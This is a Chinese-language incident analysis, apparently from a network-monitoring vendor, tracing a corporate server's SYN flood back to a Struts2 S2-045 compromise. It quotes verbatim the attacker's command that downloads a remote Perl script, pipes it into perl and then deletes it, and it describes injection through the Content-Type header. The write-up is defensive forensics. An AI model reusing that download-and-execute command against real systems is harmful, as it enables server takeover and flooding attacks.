新漏洞的剛被發現發布時，對很多企業網絡來說可能是最危險的時刻，應對不及時造成的危害可能是巨大的，特別是像Struts2 S2-045這樣的會搞死人的漏洞，顯然黑客對他們的關注度比很多企業的安管人員要高的多。這不Struts2 S2-045漏洞沒公布幾天，我們就發現了成功利用該漏洞對目標主機實現有效控制的高級攻擊實例。

　　首先說明，我們不是去分析Struts2 S2-045漏洞的，很偶然，某中國500強企業集團公司的互聯網出口防火墻CPU利用率持續保持在80%左右，防火墻高負載工作導致服務器網絡緩慢。由于該服務器上承載著大量公司核心業務，造成了嚴重影響。

　　幸運的是他們的核心交換機上部署了科來網絡回溯分析系統，進行7*24小時全流量監控，并完整記錄保存了所有網絡通訊數據(其工作模式可以簡單理解為部署在大型網絡環境中的“行車記錄儀”)。技術人員首先想到的是通過該系統分析什么原因導致了防火墻CPU利用率超高，網絡緩慢。

　　分析發現防火墻高負載與*.35服務器超常規大量發送數據包有關，服務器*.35一天多的時間共產生大量未知TCP應用流量47.48G，其中與意大利IP 62.149.175.81通訊流量達到44.21GB，行為極為可疑。

　　回溯分析*.35與意大利IP會話通訊，*.35服務器每秒鐘的流量6Mbps左右，大量的TCP會話，每個會話均顯示連接被重置，平均包長71字節，綜合這些特征，懷疑*.35發動SYN Flood攻擊。

　　通過數據包分析，確認*.35 向62.149.175.81發送大量SYN，后者快速回復RST的數據包(目標服務器可能已經掛掉)，*.35發出的SYN數量極多同時頻率極高現象，基本斷定*.35發動了SYN Flood攻擊。

　　這時候結論已經出來了，網絡慢的元兇是*.35，它發動了SYN Flood攻擊，極高頻率地發送了大量的SYN包，建立大量TCP連接，占用防火墻資源，直接影響了正常業務通訊。

　　這時候我們的分析還沒完，我們想查查*.35中了什么邪，有回溯我們就可以追溯到*.35大量發包前到底發生了什么。這時候追蹤到了新鮮出爐的Struts2 S2-045漏洞的新鮮利用，真夠快的。

　　一個香港IP 223.255.145.158利用Struts2 S2-045漏洞攻擊(在Content-type: 中插入非法字符串來遠程執行命令并嘗試執行該腳本，執行完成后刪除)，執行的腳本信息為：

　　wget -qO - http://65.254.63.20/.jb | perl ;cd /tmp ;curl -O http://65.254.63.20/.jb ;fetch http://65.254.63.20/.jb ;perl .jb ;rm -rf .jb*，即問題服務器向65.254.63.20 get請求.jb文件。

　　進一步分析，我們發現問題服務器*.35確實下載獲取到.jb文件。真實腳本為per1，可以看到62.149.175.81(SYN Flood目標IP)及端口8080。綜合上文分析，基本上可以判定被黑客(所用IP 223.255.145.158)通過Struts2漏洞攻擊入侵后，執行命令向美國IP 65.254.63.20請求下載了.jb文件，并執行了per1腳本SYN Flood攻擊62.149.175.81.

　　結論清楚了，我們發現本次安全事件是黑客通過Struts2的S2-045漏洞，遠程向問題服務器執行惡意代碼，導致服務器主動下載腳本并成為肉雞實施SYN Flood攻擊，導致互聯網訪問出現嚴重性能下降。本人有點小激動，哇哈哈，第一次發現真實的全新的漏洞利用，還是全程回放。

　　最后，發表一下此次事件處理的小感受。

　　首先是，漏洞是可怕的，要重視，要重視，要重視，趕緊打補丁，不是鬧著玩的，別讓黑客比你重視，比你現發現，那就完了。

　　再有就是，對關鍵網絡系統長期的網絡分析，回溯分析太重要了，即使沒有公布的漏洞被利用，我們通過對網絡異常行為的分析，也能做到全程追溯分析，網絡環境越來越復雜，沒有可視性的網絡是非常危險的。安全態勢感知，首先是要可視，通過智能分析發現異常行為，是最基礎的感知!能看到的越多就越安全。